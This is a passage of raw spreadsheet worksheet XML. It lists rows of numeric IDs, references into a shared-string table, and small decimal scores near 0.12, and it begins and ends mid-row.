      <c r="C1184" s="2" t="s">
        <v>1063</v>
      </c>
      <c r="D1184" s="2">
        <v>1.0</v>
      </c>
      <c r="E1184" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1184" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="1185" ht="15.75" customHeight="1">
      <c r="A1185" s="1">
        <v>15645.0</v>
      </c>
      <c r="B1185" s="2">
        <v>4.3606778E7</v>
      </c>
      <c r="C1185" s="2" t="s">
        <v>1064</v>
      </c>
      <c r="D1185" s="2">
        <v>1.0</v>
      </c>
      <c r="E1185" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1185" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="1186" ht="15.75" customHeight="1">
      <c r="A1186" s="1">
        <v>30976.0</v>
      </c>
      <c r="B1186" s="2">
        <v>4751735.0</v>
      </c>
      <c r="C1186" s="2" t="s">
        <v>1065</v>
      </c>
      <c r="D1186" s="2">
        <v>1.0</v>
      </c>
      <c r="E1186" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1186" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="1187" ht="15.75" customHeight="1">
      <c r="A1187" s="1">
        <v>28000.0</v>
      </c>
      <c r="B1187" s="2">
        <v>2.4279076E7</v>
      </c>
      <c r="C1187" s="2" t="s">
        <v>1066</v>
      </c>
      <c r="D1187" s="2">
        <v>1.0</v>
      </c>
      <c r="E1187" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1187" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="1188" ht="15.75" customHeight="1">
      <c r="A1188" s="1">
        <v>28358.0</v>
      </c>
      <c r="B1188" s="2">
        <v>2.5964288E7</v>
      </c>
      <c r="C1188" s="2" t="s">
        <v>1067</v>
      </c>
      <c r="D1188" s="2">
        <v>1.0</v>
      </c>
      <c r="E1188" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1188" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="1189" ht="15.75" customHeight="1">
      <c r="A1189" s="1">
        <v>28757.0</v>
      </c>
      <c r="B1189" s="2">
        <v>2.814939E7</v>
      </c>
      <c r="C1189" s="2" t="s">
        <v>1068</v>
      </c>
      <c r="D1189" s="2">
        <v>1.0</v>
      </c>
      <c r="E1189" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1189" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="1190" ht="15.75" customHeight="1">
      <c r="A1190" s="1">
        <v>30276.0</v>
      </c>
      <c r="B1190" s="2">
        <v>3.7725834E7</v>
      </c>
      <c r="C1190" s="2" t="s">
        <v>1069</v>
      </c>
      <c r="D1190" s="2">
        <v>1.0</v>
      </c>
      <c r="E1190" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1190" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="1191" ht="15.75" customHeight="1">
      <c r="A1191" s="1">
        <v>30566.0</v>
      </c>
      <c r="B1191" s="2">
        <v>4.090957E7</v>
      </c>
      <c r="C1191" s="2" t="s">
        <v>1070</v>
      </c>
      <c r="D1191" s="2">
        <v>1.0</v>
      </c>
      <c r="E1191" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1191" s="2">
        <v>0.1200274348422496</v>
      </c>
    </row>
    <row r="1192" ht="15.75" customHeight="1">
      <c r="A1192" s="1">
        <v>2958.0</v>
      </c>
      <c r="B1192" s="2">
        <v>3.6024807E7</v>
      </c>
      <c r="C1192" s="2" t="s">
        <v>1071</v>
      </c>
      <c r="D1192" s="2">
        <v>1.0</v>
      </c>
      <c r="E1192" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1192" s="2">
        <v>0.1199677938808374</v>
      </c>
    </row>
    <row r="1193" ht="15.75" customHeight="1">
      <c r="A1193" s="1">
        <v>5328.0</v>
      </c>
      <c r="B1193" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C1193" s="2" t="s">
        <v>1072</v>
      </c>
      <c r="D1193" s="2">
        <v>1.0</v>
      </c>
      <c r="E1193" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1193" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="1194" ht="15.75" customHeight="1">
      <c r="A1194" s="1">
        <v>21944.0</v>
      </c>
      <c r="B1194" s="2">
        <v>2.8749482E7</v>
      </c>
      <c r="C1194" s="2" t="s">
        <v>1073</v>
      </c>
      <c r="D1194" s="2">
        <v>1.0</v>
      </c>
      <c r="E1194" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1194" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="1195" ht="15.75" customHeight="1">
      <c r="A1195" s="1">
        <v>24369.0</v>
      </c>
      <c r="B1195" s="2">
        <v>1.074267E7</v>
      </c>
      <c r="C1195" s="2" t="s">
        <v>1074</v>
      </c>
      <c r="D1195" s="2">
        <v>1.0</v>
      </c>
      <c r="E1195" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1195" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="1196" ht="15.75" customHeight="1">
      <c r="A1196" s="1">
        <v>29677.0</v>
      </c>
      <c r="B1196" s="2">
        <v>3.3994054E7</v>
      </c>
      <c r="C1196" s="2" t="s">
        <v>1075</v>
      </c>
      <c r="D1196" s="2">
        <v>1.0</v>
      </c>
      <c r="E1196" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1196" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="1197" ht="15.75" customHeight="1">
      <c r="A1197" s="1">
        <v>29751.0</v>
      </c>
      <c r="B1197" s="2">
        <v>3.4743205E7</v>
      </c>
      <c r="C1197" s="2" t="s">
        <v>1076</v>
      </c>
      <c r="D1197" s="2">
        <v>1.0</v>
      </c>
      <c r="E1197" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1197" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="1198" ht="15.75" customHeight="1">
      <c r="A1198" s="1">
        <v>15847.0</v>
      </c>
      <c r="B1198" s="2">
        <v>4.4430988E7</v>
      </c>
      <c r="C1198" s="2" t="s">
        <v>1077</v>
      </c>
      <c r="D1198" s="2">
        <v>1.0</v>
      </c>
      <c r="E1198" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1198" s="2">
        <v>0.1198412698412699</v>
      </c>
    </row>
    <row r="1199" ht="15.75" customHeight="1">
      <c r="A1199" s="1">
        <v>12098.0</v>
      </c>
      <c r="B1199" s="2">
        <v>2.6751945E7</v>
      </c>
      <c r="C1199" s="2" t="s">
        <v>1078</v>
      </c>
      <c r="D1199" s="2">
        <v>1.0</v>
      </c>
      <c r="E1199" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1199" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="1200" ht="15.75" customHeight="1">
      <c r="A1200" s="1">
        <v>16107.0</v>
      </c>
      <c r="B1200" s="2">
        <v>4.5399501E7</v>
      </c>
      <c r="C1200" s="2" t="s">
        <v>1079</v>
      </c>
      <c r="D1200" s="2">
        <v>1.0</v>
      </c>
      <c r="E1200" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1200" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="1201" ht="15.75" customHeight="1">
      <c r="A1201" s="1">
        <v>25384.0</v>
      </c>
      <c r="B1201" s="2">
        <v>1.3664227E7</v>
      </c>
      <c r="C1201" s="2" t="s">
        <v>1080</v>
      </c>
      <c r="D1201" s="2">
        <v>1.0</v>
      </c>
      <c r="E1201" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1201" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="1202" ht="15.75" customHeight="1">
      <c r="A1202" s="1">
        <v>33195.0</v>
      </c>
      <c r="B1202" s="2">
        <v>7159265.0</v>
      </c>
      <c r="C1202" s="2" t="s">
        <v>1081</v>
      </c>
      <c r="D1202" s="2">
        <v>1.0</v>
      </c>
      <c r="E1202" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1202" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="1203" ht="15.75" customHeight="1">
      <c r="A1203" s="1">
        <v>525.0</v>
      </c>
      <c r="B1203" s="2">
        <v>1.8396251E7</v>
      </c>
      <c r="C1203" s="2" t="s">
        <v>1082</v>
      </c>
      <c r="D1203" s="2">
        <v>1.0</v>
      </c>
      <c r="E1203" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1203" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1204" ht="15.75" customHeight="1">
      <c r="A1204" s="1">
        <v>10710.0</v>
      </c>
      <c r="B1204" s="2">
        <v>1.4956107E7</v>
      </c>
      <c r="C1204" s="2" t="s">
        <v>1083</v>
      </c>
      <c r="D1204" s="2">
        <v>1.0</v>
      </c>
      <c r="E1204" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1204" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1205" ht="15.75" customHeight="1">
      <c r="A1205" s="1">
        <v>18161.0</v>
      </c>
      <c r="B1205" s="2">
        <v>5.1904408E7</v>
      </c>
      <c r="C1205" s="2" t="s">
        <v>1084</v>
      </c>
      <c r="D1205" s="2">
        <v>1.0</v>
      </c>
      <c r="E1205" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1205" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1206" ht="15.75" customHeight="1">
      <c r="A1206" s="1">
        <v>22458.0</v>
      </c>
      <c r="B1206" s="2">
        <v>3.632766E7</v>
      </c>
      <c r="C1206" s="2" t="s">
        <v>1085</v>
      </c>
      <c r="D1206" s="2">
        <v>1.0</v>
      </c>
      <c r="E1206" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1206" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1207" ht="15.75" customHeight="1">
      <c r="A1207" s="1">
        <v>27467.0</v>
      </c>
      <c r="B1207" s="2">
        <v>2.1987607E7</v>
      </c>
      <c r="C1207" s="2" t="s">
        <v>1086</v>
      </c>
      <c r="D1207" s="2">
        <v>1.0</v>
      </c>
      <c r="E1207" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1207" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1208" ht="15.75" customHeight="1">
      <c r="A1208" s="1">
        <v>29491.0</v>
      </c>
      <c r="B1208" s="2">
        <v>3.2566395E7</v>
      </c>
      <c r="C1208" s="2" t="s">
        <v>1087</v>
      </c>
      <c r="D1208" s="2">
        <v>1.0</v>
      </c>
      <c r="E1208" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1208" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1209" ht="15.75" customHeight="1">
      <c r="A1209" s="1">
        <v>31024.0</v>
      </c>
      <c r="B1209" s="2">
        <v>4.7777074E7</v>
      </c>
      <c r="C1209" s="2" t="s">
        <v>1036</v>
      </c>
      <c r="D1209" s="2">
        <v>1.0</v>
      </c>
      <c r="E1209" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1209" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1210" ht="15.75" customHeight="1">
      <c r="A1210" s="1">
        <v>32326.0</v>
      </c>
      <c r="B1210" s="2">
        <v>5.5773376E7</v>
      </c>
      <c r="C1210" s="2" t="s">
        <v>1088</v>
      </c>
      <c r="D1210" s="2">
        <v>1.0</v>
      </c>
      <c r="E1210" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1210" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1211" ht="15.75" customHeight="1">
      <c r="A1211" s="1">
        <v>33916.0</v>
      </c>
      <c r="B1211" s="2">
        <v>9236453.0</v>
      </c>
      <c r="C1211" s="2" t="s">
        <v>1089</v>
      </c>
      <c r="D1211" s="2">
        <v>1.0</v>
      </c>
      <c r="E1211" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1211" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="1212" ht="15.75" customHeight="1">
      <c r="A1212" s="1">
        <v>14300.0</v>
      </c>
      <c r="B1212" s="2">
        <v>3.8583937E7</v>
      </c>
      <c r="C1212" s="2" t="s">
        <v>1090</v>
      </c>
      <c r="D1212" s="2">
        <v>1.0</v>
      </c>
      <c r="E1212" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1212" s="2">
        <v>0.119482496194825</v>
      </c>
    </row>
    <row r="1213" ht="15.75" customHeight="1">
      <c r="A1213" s="1">
        <v>994.0</v>
      </c>
      <c r="B1213" s="2">
        <v>2.291338E7</v>
      </c>
      <c r="C1213" s="2" t="s">
        <v>1091</v>
      </c>
      <c r="D1213" s="2">
        <v>1.0</v>
      </c>
      <c r="E1213" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1213" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1214" ht="15.75" customHeight="1">
      <c r="A1214" s="1">
        <v>12565.0</v>
      </c>
      <c r="B1214" s="2">
        <v>2.9939308E7</v>
      </c>
      <c r="C1214" s="2" t="s">
        <v>1092</v>
      </c>
      <c r="D1214" s="2">
        <v>1.0</v>
      </c>
      <c r="E1214" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1214" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1215" ht="15.75" customHeight="1">
      <c r="A1215" s="1">
        <v>12837.0</v>
      </c>
      <c r="B1215" s="2">
        <v>3.1677536E7</v>
      </c>
      <c r="C1215" s="2" t="s">
        <v>1093</v>
      </c>
      <c r="D1215" s="2">
        <v>1.0</v>
      </c>
      <c r="E1215" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1215" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1216" ht="15.75" customHeight="1">
      <c r="A1216" s="1">
        <v>16294.0</v>
      </c>
      <c r="B1216" s="2">
        <v>4.5830779E7</v>
      </c>
      <c r="C1216" s="2" t="s">
        <v>1094</v>
      </c>
      <c r="D1216" s="2">
        <v>1.0</v>
      </c>
      <c r="E1216" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1216" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1217" ht="15.75" customHeight="1">
      <c r="A1217" s="1">
        <v>20654.0</v>
      </c>
      <c r="B1217" s="2">
        <v>1.4277349E7</v>
      </c>
      <c r="C1217" s="2" t="s">
        <v>1095</v>
      </c>
      <c r="D1217" s="2">
        <v>1.0</v>
      </c>
      <c r="E1217" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1217" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1218" ht="15.75" customHeight="1">
      <c r="A1218" s="1">
        <v>21251.0</v>
      </c>
      <c r="B1218" s="2">
        <v>1.9994275E7</v>
      </c>
      <c r="C1218" s="2" t="s">
        <v>1096</v>
      </c>
      <c r="D1218" s="2">
        <v>1.0</v>
      </c>
      <c r="E1218" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1218" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1219" ht="15.75" customHeight="1">
      <c r="A1219" s="1">
        <v>21888.0</v>
      </c>
      <c r="B1219" s="2">
        <v>2.7780489E7</v>
      </c>
      <c r="C1219" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="D1219" s="2">
        <v>1.0</v>
      </c>
      <c r="E1219" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1219" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1220" ht="15.75" customHeight="1">
      <c r="A1220" s="1">
        <v>22735.0</v>
      </c>
      <c r="B1220" s="2">
        <v>4.4000704E7</v>
      </c>
      <c r="C1220" s="2" t="s">
        <v>1098</v>
      </c>
      <c r="D1220" s="2">
        <v>1.0</v>
      </c>
      <c r="E1220" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1220" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1221" ht="15.75" customHeight="1">
      <c r="A1221" s="1">
        <v>23395.0</v>
      </c>
      <c r="B1221" s="2">
        <v>5575600.0</v>
      </c>
      <c r="C1221" s="2" t="s">
        <v>1099</v>
      </c>
      <c r="D1221" s="2">
        <v>1.0</v>
      </c>
      <c r="E1221" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1221" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1222" ht="15.75" customHeight="1">
      <c r="A1222" s="1">
        <v>26747.0</v>
      </c>
      <c r="B1222" s="2">
        <v>1.8346516E7</v>
      </c>
      <c r="C1222" s="2" t="s">
        <v>1100</v>
      </c>
      <c r="D1222" s="2">
        <v>1.0</v>
      </c>
      <c r="E1222" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1222" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1223" ht="15.75" customHeight="1">
      <c r="A1223" s="1">
        <v>27704.0</v>
      </c>
      <c r="B1223" s="2">
        <v>2.3040243E7</v>
      </c>
      <c r="C1223" s="2" t="s">
        <v>1101</v>
      </c>
      <c r="D1223" s="2">
        <v>1.0</v>
      </c>
      <c r="E1223" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1223" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1224" ht="15.75" customHeight="1">
      <c r="A1224" s="1">
        <v>28647.0</v>
      </c>
      <c r="B1224" s="2">
        <v>2.7322414E7</v>
      </c>
      <c r="C1224" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="D1224" s="2">
        <v>1.0</v>
      </c>
      <c r="E1224" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1224" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1225" ht="15.75" customHeight="1">
      <c r="A1225" s="1">
        <v>30734.0</v>
      </c>
      <c r="B1225" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C1225" s="2" t="s">
        <v>1103</v>
      </c>
      <c r="D1225" s="2">
        <v>1.0</v>
      </c>
      <c r="E1225" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1225" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1226" ht="15.75" customHeight="1">
      <c r="A1226" s="1">
        <v>30836.0</v>
      </c>
      <c r="B1226" s="2">
        <v>4.554756E7</v>
      </c>
      <c r="C1226" s="2" t="s">
        <v>1104</v>
      </c>
      <c r="D1226" s="2">
        <v>1.0</v>
      </c>
      <c r="E1226" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1226" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1227" ht="15.75" customHeight="1">
      <c r="A1227" s="1">
        <v>31645.0</v>
      </c>
      <c r="B1227" s="2">
        <v>5.1556379E7</v>
      </c>
      <c r="C1227" s="2" t="s">
        <v>1105</v>
      </c>
      <c r="D1227" s="2">
        <v>1.0</v>
      </c>
      <c r="E1227" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1227" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1228" ht="15.75" customHeight="1">
      <c r="A1228" s="1">
        <v>31843.0</v>
      </c>
      <c r="B1228" s="2">
        <v>5273629.0</v>
      </c>
      <c r="C1228" s="2" t="s">
        <v>1106</v>
      </c>
      <c r="D1228" s="2">
        <v>1.0</v>
      </c>
      <c r="E1228" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1228" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1229" ht="15.75" customHeight="1">
      <c r="A1229" s="1">
        <v>31931.0</v>
      </c>
      <c r="B1229" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C1229" s="2" t="s">
        <v>1107</v>
      </c>
      <c r="D1229" s="2">
        <v>1.0</v>
      </c>
      <c r="E1229" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1229" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1230" ht="15.75" customHeight="1">
      <c r="A1230" s="1">
        <v>33667.0</v>
      </c>
      <c r="B1230" s="2">
        <v>8420432.0</v>
      </c>
      <c r="C1230" s="2" t="s">
        <v>1108</v>
      </c>
      <c r="D1230" s="2">
        <v>1.0</v>
      </c>
      <c r="E1230" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1230" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="1231" ht="15.75" customHeight="1">
      <c r="A1231" s="1">
        <v>2469.0</v>
      </c>
      <c r="B1231" s="2">
        <v>3.3827273E7</v>
      </c>
      <c r="C1231" s="2" t="s">
        <v>1109</v>
      </c>
      <c r="D1231" s="2">
        <v>1.0</v>
      </c>
      <c r="E1231" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1231" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1232" ht="15.75" customHeight="1">
      <c r="A1232" s="1">
        <v>6540.0</v>
      </c>
      <c r="B1232" s="2">
        <v>4.8853333E7</v>
      </c>
      <c r="C1232" s="2" t="s">
        <v>1110</v>
      </c>
      <c r="D1232" s="2">
        <v>1.0</v>
      </c>
      <c r="E1232" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1232" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1233" ht="15.75" customHeight="1">
      <c r="A1233" s="1">
        <v>15919.0</v>
      </c>
      <c r="B1233" s="2">
        <v>4.4670083E7</v>
      </c>
      <c r="C1233" s="2" t="s">
        <v>1111</v>
      </c>
      <c r="D1233" s="2">
        <v>1.0</v>
      </c>
      <c r="E1233" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1233" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1234" ht="15.75" customHeight="1">
      <c r="A1234" s="1">
        <v>16541.0</v>
      </c>
      <c r="B1234" s="2">
        <v>4.6777727E7</v>
      </c>
      <c r="C1234" s="2" t="s">
        <v>1112</v>
      </c>
      <c r="D1234" s="2">
        <v>1.0</v>
      </c>
      <c r="E1234" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1234" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1235" ht="15.75" customHeight="1">
      <c r="A1235" s="1">
        <v>18850.0</v>
      </c>
      <c r="B1235" s="2">
        <v>5.3980856E7</v>
      </c>
      <c r="C1235" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="D1235" s="2">
        <v>1.0</v>
      </c>
      <c r="E1235" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1235" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1236" ht="15.75" customHeight="1">
      <c r="A1236" s="1">
        <v>19050.0</v>
      </c>
      <c r="B1236" s="2">
        <v>5.4578302E7</v>
      </c>
      <c r="C1236" s="2" t="s">
        <v>1114</v>
      </c>
      <c r="D1236" s="2">
        <v>1.0</v>
      </c>
      <c r="E1236" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1236" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1237" ht="15.75" customHeight="1">
      <c r="A1237" s="1">
        <v>20433.0</v>
      </c>
      <c r="B1237" s="2">
        <v>1.2361979E7</v>
      </c>
      <c r="C1237" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="D1237" s="2">
        <v>1.0</v>
      </c>
      <c r="E1237" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1237" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1238" ht="15.75" customHeight="1">
      <c r="A1238" s="1">
        <v>22525.0</v>
      </c>
      <c r="B1238" s="2">
        <v>3.7729339E7</v>
      </c>
      <c r="C1238" s="2" t="s">
        <v>1116</v>
      </c>
      <c r="D1238" s="2">
        <v>1.0</v>
      </c>
      <c r="E1238" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1238" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1239" ht="15.75" customHeight="1">
      <c r="A1239" s="1">
        <v>23091.0</v>
      </c>
      <c r="B1239" s="2">
        <v>5.0692639E7</v>
      </c>
      <c r="C1239" s="2" t="s">
        <v>1117</v>
      </c>
      <c r="D1239" s="2">
        <v>1.0</v>
      </c>
      <c r="E1239" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1239" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1240" ht="15.75" customHeight="1">
      <c r="A1240" s="1">
        <v>23129.0</v>
      </c>
      <c r="B1240" s="2">
        <v>5.1391595E7</v>
      </c>
      <c r="C1240" s="2" t="s">
        <v>1118</v>
      </c>
      <c r="D1240" s="2">
        <v>1.0</v>
      </c>
      <c r="E1240" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1240" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1241" ht="15.75" customHeight="1">
      <c r="A1241" s="1">
        <v>25544.0</v>
      </c>
      <c r="B1241" s="2">
        <v>1.4277348E7</v>
      </c>
      <c r="C1241" s="2" t="s">
        <v>1095</v>
      </c>
      <c r="D1241" s="2">
        <v>1.0</v>
      </c>
      <c r="E1241" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1241" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1242" ht="15.75" customHeight="1">
      <c r="A1242" s="1">
        <v>27062.0</v>
      </c>
      <c r="B1242" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C1242" s="2" t="s">
        <v>1119</v>
      </c>
      <c r="D1242" s="2">
        <v>1.0</v>
      </c>
      <c r="E1242" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1242" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1243" ht="15.75" customHeight="1">
      <c r="A1243" s="1">
        <v>27167.0</v>
      </c>
      <c r="B1243" s="2">
        <v>2.0851159E7</v>
      </c>
      <c r="C1243" s="2" t="s">
        <v>1120</v>
      </c>
      <c r="D1243" s="2">
        <v>1.0</v>
      </c>
      <c r="E1243" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1243" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1244" ht="15.75" customHeight="1">
      <c r="A1244" s="1">
        <v>28185.0</v>
      </c>
      <c r="B1244" s="2">
        <v>2.5006496E7</v>
      </c>
      <c r="C1244" s="2" t="s">
        <v>1121</v>
      </c>
      <c r="D1244" s="2">
        <v>1.0</v>
      </c>
      <c r="E1244" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1244" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1245" ht="15.75" customHeight="1">
      <c r="A1245" s="1">
        <v>30281.0</v>
      </c>
      <c r="B1245" s="2">
        <v>3.7729338E7</v>
      </c>
      <c r="C1245" s="2" t="s">
        <v>1116</v>
      </c>
      <c r="D1245" s="2">
        <v>1.0</v>
      </c>
      <c r="E1245" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1245" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1246" ht="15.75" customHeight="1">
      <c r="A1246" s="1">
        <v>31410.0</v>
      </c>
      <c r="B1246" s="2">
        <v>5006358.0</v>
      </c>
      <c r="C1246" s="2" t="s">
        <v>1122</v>
      </c>
      <c r="D1246" s="2">
        <v>1.0</v>
      </c>
      <c r="E1246" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1246" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="1247" ht="15.75" customHeight="1">
      <c r="A1247" s="1">
        <v>29156.0</v>
      </c>
      <c r="B1247" s="2">
        <v>3.0616922E7</v>
      </c>
      <c r="C1247" s="2" t="s">
        <v>1123</v>
      </c>
      <c r="D1247" s="2">
        <v>1.0</v>
      </c>
      <c r="E1247" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1247" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="1248" ht="15.75" customHeight="1">
      <c r="A1248" s="1">
        <v>29379.0</v>
      </c>
      <c r="B1248" s="2">
        <v>3.1810279E7</v>
      </c>
      <c r="C1248" s="2" t="s">
        <v>1124</v>
      </c>
      <c r="D1248" s="2">
        <v>1.0</v>
      </c>
      <c r="E1248" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1248" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="1249" ht="15.75" customHeight="1">
      <c r="A1249" s="1">
        <v>32126.0</v>
      </c>
      <c r="B1249" s="2">
        <v>5.4113315E7</v>
      </c>
      <c r="C1249" s="2" t="s">
        <v>1125</v>
      </c>
      <c r="D1249" s="2">
        <v>1.0</v>
      </c>
      <c r="E1249" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1249" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="1250" ht="15.75" customHeight="1">
      <c r="A1250" s="1">
        <v>1852.0</v>
      </c>
      <c r="B1250" s="2">
        <v>2.9491364E7</v>
      </c>
      <c r="C1250" s="2" t="s">
        <v>1126</v>
      </c>
      <c r="D1250" s="2">
        <v>1.0</v>
      </c>
      <c r="E1250" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1250" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="1251" ht="15.75" customHeight="1">
      <c r="A1251" s="1">
        <v>396.0</v>
      </c>
      <c r="B1251" s="2">
        <v>1.6619734E7</v>
      </c>
      <c r="C1251" s="2" t="s">
        <v>1127</v>
      </c>
      <c r="D1251" s="2">
        <v>1.0</v>
      </c>
      <c r="E1251" s="3" t="s">
